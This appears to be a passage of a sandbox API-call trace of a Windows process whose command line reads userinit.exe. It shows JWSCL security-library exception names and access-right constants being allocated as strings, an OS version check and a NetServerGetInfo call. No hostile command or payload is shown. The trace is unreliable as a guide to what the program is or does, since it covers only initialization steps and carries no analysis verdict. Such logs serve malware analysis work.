[0110.340] SysReAllocStringLen (in: pbstr=0x291f258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x291f258*="EJwsclInvalidFlagsException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x291f240*="EJwsclProcessNotFound") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x291f228*="EJwsclInvalidParameterException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x291f210*="EJwsclInvalidPathException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x291f1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x291f1e0*="EJwsclInvalidRevision") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x291f1c8*="EJwsclInvalidAceMismatch") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x291f1b0*="EJwsclRevisionMismatchException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x291f198*="EJwsclInvalidACEException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x291f180*="EJwsclReadOnlyPropertyException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x291f168*="EJwsclDuplicateListEntryException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x291f150*="EJwsclIndexOutOfBoundsException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x291f138*="EJwsclInvalidSidAuthorityValue") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x291f120*="EJwsclInvalidKnownSIDException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x291f108*="EJwsclInvalidComputer") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x291f0f0*="EJwsclInvalidGroupSIDException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x291f0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x291f0c0*="EJwsclInvalidSIDException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x291f0a8*="EJwsclInvalidSecurityListException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x291f090*="EJwsclInvalidMandatoryLevelException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x291f078*="EJwsclEmptyACLException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x291f060*="EJwsclNILParameterException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x291f048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0110.340] SysReAllocStringLen (in: pbstr=0x291f030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x291f030*="EJwsclInvalidObjectArrayException") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291f018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x291f018*="EJwsclProcessIdNotAvailable") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291f000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x291f000*="EJwsclWinCallFailedException") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291efe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x291efe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291efd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x291efd0*="EJwsclNotImplementedException") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291efb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x291efb8*="EJwsclAccessTypeException") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291efa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x291efa0*="EJwsclAdjustPrivilegeException") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291ef88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x291ef88*="EJwsclPrivilegeCheckException") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291ef70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x291ef70*="EJwsclPrivilegeNotFoundException") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291ef58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x291ef58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291ef40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x291ef40*="EJwsclPrivilegeException") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291ef28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x291ef28*="EJwsclNotEnoughMemory") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291ef10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x291ef10*="EJwsclInvalidTokenHandle") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291eef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x291eef8*="EJwsclNoThreadTokenAvailable") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291eee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x291eee0*="EJwsclDuplicateTokenException") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291eec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x291eec8*="EJwsclInvalidOwnerException") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291eeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x291eeb0*="EJwsclInvalidPrimaryToken") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291ee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x291ee98*="EJwsclTokenPrimaryException") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291ee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x291ee80*="EJwsclTokenImpersonationException") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291ee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x291ee68*="EJwsclTokenInformationException") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291ee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x291ee50*="EJwsclSharedTokenException") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291ee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x291ee38*="EJwsclOpenProcessTokenException") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291ee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x291ee20*="EJwsclOpenThreadTokenException") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291ee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x291ee08*="EJwsclSecurityException") returned 1
[0110.341] SysReAllocStringLen (in: pbstr=0x291edf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x291edf0*="Exception") returned 1
[0110.341] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.341] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0110.342] GetVersionExA (in: lpVersionInformation=0x24f55c*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x110000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="\x84\xf5\x24") | out: lpVersionInformation=0x24f55c*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0110.342] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0110.342] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0110.347] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0110.347] NetServerGetInfo (in: servername="", level=0x65, bufptr=0x24f5e0 | out: bufptr=0x24f5e0) returned 0x0
[0110.386] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0110.387] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0110.387] NetApiBufferFree (Buffer=0x131d00) returned 0x0
[0110.387] SetErrorMode (uMode=0x8000) returned 0x1
[0110.387] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0110.387] SetErrorMode (uMode=0x1) returned 0x8000
[0110.387] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0110.388] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0110.390] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0110.391] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0110.392] SysReAllocStringLen (in: pbstr=0x291ec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291ec40*="DELETE") returned 1
[0110.392] SysReAllocStringLen (in: pbstr=0x291ec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291ec30*="READ_CONTROL") returned 1
[0110.392] SysReAllocStringLen (in: pbstr=0x291ec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291ec20*="WRITE_OWNER") returned 1
[0110.392] SysReAllocStringLen (in: pbstr=0x291ec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291ec10*="WRITE_DAC") returned 1
[0110.392] SysReAllocStringLen (in: pbstr=0x291ec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x291ec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0110.392] SysReAllocStringLen (in: pbstr=0x291ebf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x291ebf0*="FILE_READ_ATTRIBUTES") returned 1
[0110.392] SysReAllocStringLen (in: pbstr=0x291ebe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x291ebe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0110.392] SysReAllocStringLen (in: pbstr=0x291ebd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x291ebd0*="FILE_WRITE_DATA") returned 1
[0110.392] SysReAllocStringLen (in: pbstr=0x291ebc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x291ebc0*="FILE_READ_DATA") returned 1
[0110.392] SysReAllocStringLen (in: pbstr=0x291ebb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x291ebb0*="FILE_ALL_ACCESS") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291eba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291eba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291eb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291eb90*="STANDARD_RIGHTS_WRITE") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291eb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291eb80*="STANDARD_RIGHTS_READ") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291eb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291eb70*="STANDARD_RIGHTS_ALL") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291eb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291eb50*="DELETE") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291eb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291eb40*="READ_CONTROL") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291eb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291eb30*="WRITE_OWNER") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291eb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291eb20*="WRITE_DAC") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291eb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x291eb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291eb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x291eb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291eaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x291eaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291eae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x291eae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291ead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x291ead0*="TOKEN_QUERY_SOURCE") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291eac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x291eac0*="TOKEN_QUERY") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291eab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x291eab0*="TOKEN_IMPERSONATE") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291eaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x291eaa0*="TOKEN_DUPLICATE") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291ea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x291ea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291ea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x291ea80*="TOKEN_ALL_ACCESS") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291ea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291ea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291ea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291ea60*="STANDARD_RIGHTS_WRITE") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291ea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291ea50*="STANDARD_RIGHTS_READ") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291ea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291ea40*="STANDARD_RIGHTS_ALL") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291ea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291ea30*="DELETE") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291ea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291ea20*="READ_CONTROL") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291ea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291ea10*="WRITE_OWNER") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291ea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291ea00*="WRITE_DAC") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291e9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x291e9f0*="TIMER_MODIFY_STATE") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291e9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x291e9e0*="TIMER_QUERY_STATE") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291e9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x291e9d0*="TIMER_ALL_ACCESS") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291e9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291e9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291e9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e9a0*="STANDARD_RIGHTS_READ") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291e990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e990*="STANDARD_RIGHTS_ALL") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291e980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e980*="DELETE") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291e970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e970*="READ_CONTROL") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291e960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e960*="WRITE_OWNER") returned 1
[0110.393] SysReAllocStringLen (in: pbstr=0x291e950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e950*="WRITE_DAC") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x291e940*="SECTION_EXTEND_SIZE") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x291e930*="FILE_MAP_READ") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x291e920*="FILE_MAP_WRITE") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x291e910*="FILE_MAP_COPY") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x291e900*="FILE_MAP_ALL_ACCESS") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e8d0*="STANDARD_RIGHTS_READ") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e8c0*="STANDARD_RIGHTS_ALL") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e8b0*="DELETE") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e8a0*="READ_CONTROL") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e890*="WRITE_OWNER") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e880*="WRITE_DAC") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x291e870*="MUTEX_MODIFY_STATE") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x291e860*="MUTEX_ALL_ACCESS") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e840*="STANDARD_RIGHTS_WRITE") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e830*="STANDARD_RIGHTS_READ") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e820*="STANDARD_RIGHTS_ALL") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e810*="DELETE") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e800*="READ_CONTROL") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e7f0*="WRITE_OWNER") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e7e0*="WRITE_DAC") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x291e7d0*="EVENT_MODIFY_STATE") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x291e7c0*="EVENT_ALL_ACCESS") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e790*="STANDARD_RIGHTS_READ") returned 1
[0110.394] SysReAllocStringLen (in: pbstr=0x291e780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e780*="STANDARD_RIGHTS_ALL") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e770*="DELETE") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e760*="READ_CONTROL") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e750*="WRITE_OWNER") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e740*="WRITE_DAC") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x291e730*="SEMAPHORE_MODIFY_STATE") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x291e720*="SEMAPHORE_ALL_ACCESS") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e700*="STANDARD_RIGHTS_WRITE") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e6f0*="STANDARD_RIGHTS_READ") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e6e0*="STANDARD_RIGHTS_ALL") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x291e6d0*="DELETE") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x291e6c0*="READ_CONTROL") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x291e6b0*="WRITE_OWNER") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x291e6a0*="WRITE_DAC") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x291e690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x291e680*="JOB_OBJECT_TERMINATE") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x291e670*="JOB_OBJECT_QUERY") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x291e660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x291e650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x291e640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x291e630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x291e620*="STANDARD_RIGHTS_WRITE") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x291e610*="STANDARD_RIGHTS_READ") returned 1
[0110.395] SysReAllocStringLen (in: pbstr=0x291e600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x291e600*="STANDARD_RIGHTS_ALL") returned 1
